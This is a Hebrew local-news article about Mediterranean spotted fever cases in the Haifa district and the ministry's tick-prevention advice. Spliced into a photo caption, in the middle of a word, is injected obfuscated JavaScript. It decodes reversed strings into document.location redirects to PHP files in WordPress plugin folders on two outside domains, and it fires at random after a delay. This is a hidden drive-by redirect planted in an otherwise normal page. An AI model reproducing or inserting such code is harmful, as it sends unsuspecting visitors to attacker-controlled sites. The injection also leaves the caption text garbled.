fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

כאילו לא מספיקה הקורונה: עכשיו גם קדחת הכתמים הים תיכונית

במחוז חיפה התגלו לאחרונה כמה מקרים של קדחת הכתמים הים תיכונית. המשרד להגנת הסביבה קורא לרשויות המקומיות לבצע פעולות מניעה בשטחים ציבוריים ולבעלי הכלבים לבצע טיפולים נגד קרציות
קדחת הכתמים הים תיכונית מועברת לבני אדם באמצעות עקיצה של קרציית הכלב החומה | צילום: shutterstock
קדחת הכתמים הים תיכונית מועברת לבני אדם באמצעות עקיצה של קרציית הכלב החומה | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

לאחר שהתגלו מספר מקרים של מחלת קדחת הכתמים הים תיכונית (קדחת הבהרות) במחוז חיפה: המשרד להגנת הסביבה מזהיר מפני הידבקות במחלה המועברת על-ידי קרציות וקורא לרשויות המקומיות לבצע פעולות מניעה בשטחים הציבוריים.

בעקבות דיווחים שהתקבלו במשרד להגנת הסביבה מלשכת הבריאות של מחוז חיפה על מקרים של תחלואה בקדחת הכתמים הים תיכונית (Mediterranean spotted fever – MSF), המשרד מזהיר את הציבור, כי המחלה מועברת לבני אדם באמצעות קרציות ומדגיש כי יש לטפל בכלבים ובעשבייה כדי למנוע התפרצות שלה.

ד"ר גל זגרון, מנהלת אגף מזיקים והדברה במשרד להגנת הסביבה מסבירה, כי קדחת הכתמים נגרמת על ידי הטפיל ריקציה קונורי (Rickettsia conorii) ומועברת לבני אדם באמצעות עקיצה של קרציית הכלב החומה. הקרציות חיות לרוב על כלבים, תנים ושועלים או מתחת לעשביה.

המשרד להגנת הסביבה קורא לרשויות המקומיות באזור לבצע פעולות מניעה לטיפול ודילול עשביית הפרא בשטחים הציבוריים, בפרט במקומות שבהם מסתובבים כלבים וחיות בר. יש לציין, כי פיזור של תכשירי הדברה תברואיים נגד קרציות אינו מומלץ בשטחים פתוחים וכי יש להדביר רק בסביבת מרבץ בעל החיים בתכשירים מתאימים, בהתאם להוראות התוויות.

המשרד להגנת הסביבה פנה לשירותים הווטרינריים, כדי שיקראו לבעלי הכלבים באזור לבצע לכלביהם טיפול נגד קרציות באמצעות תכשירים וטרינריים מאושרים והנחה את הרשויות לבצע טיפול כנגד קרציות רק בתחומי הישוב בעזרת תכשירי הדברה תברואיים מאושרים.

עוד על קדחת הכתמים/הבהרות באתר משרד הבריאות.

חדשות נוספות

בקרו אותנו גם בפייסבוק: הד הקריות

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות